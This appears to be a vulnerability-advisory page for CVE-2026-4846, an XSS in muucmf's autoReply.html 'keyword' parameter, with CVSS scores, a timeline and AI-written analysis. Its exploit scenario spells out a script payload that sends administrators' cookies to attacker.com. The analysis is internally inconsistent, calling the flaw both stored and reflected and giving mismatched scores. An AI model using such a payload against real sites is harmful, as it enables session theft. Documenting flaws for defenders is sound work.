Skip to main content

Muucmf EUVD-2026-16120

| CVE-2026-4846 LOW
Cross-site Scripting (XSS) (CWE-79)
2026-03-26 VulDB
XSS Muucmf
2.1
CVSS 4.0 · NVD

Severity by source

NVD PRIMARY
2.1 LOW
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
P
Scope
X

Lifecycle Timeline

6
Severity Changed
Apr 29, 2026 - 01:11 NVD
MEDIUM LOW
CVSS changed
Apr 29, 2026 - 01:11 NVD
5.3 (MEDIUM) 2.1 (LOW)
PoC Detected
Mar 30, 2026 - 13:26 vuln.today
Public exploit code
EUVD ID Assigned
Mar 26, 2026 - 06:00 euvd
EUVD-2026-16120
Analysis Generated
Mar 26, 2026 - 06:00 vuln.today
CVE Published
Mar 26, 2026 - 05:31 nvd
MEDIUM 5.3

DescriptionCVE.org

A vulnerability has been found in dameng100 muucmf 1.9.5.20260309. The affected element is an unknown function of the file channel/admin.Account/autoReply.html. Such manipulation of the argument keyword leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

AnalysisAI

A stored cross-site scripting (XSS) vulnerability exists in dameng100 muucmf version 1.9.5.20260309 and potentially earlier versions, affecting the autoReply.html administrative interface in the channel/admin.Account module. An unauthenticated attacker can inject malicious JavaScript through the 'keyword' parameter, which is reflected in the response without proper sanitization, allowing session hijacking, credential theft, or malware distribution to administrative users. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Vulnerability AssessmentAI

Risk Assessment While the CVSS 3.1 base score of 4.3 (Low-to-Medium) reflects limited scope and impact (integrity only, no confidentiality or availability damage from XSS alone), the real-world risk is elevated by several factors. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker crafts a malicious URL such as 'https://target.muucmf.local/channel/admin.Account/autoReply.html?keyword=<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>' and sends it via spear-phishing email to a known administrator. When the administrator clicks the link and views the autoReply.html page, the unvalidated 'keyword' parameter is reflected into the HTML response, causing the injected JavaScript to execute in the administrator's browser context. …
Remediation Immediate action is necessary given the lack of vendor response. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 30 days: Identify affected systems and apply vendor patches as part of regular patch cycle. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-16120 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy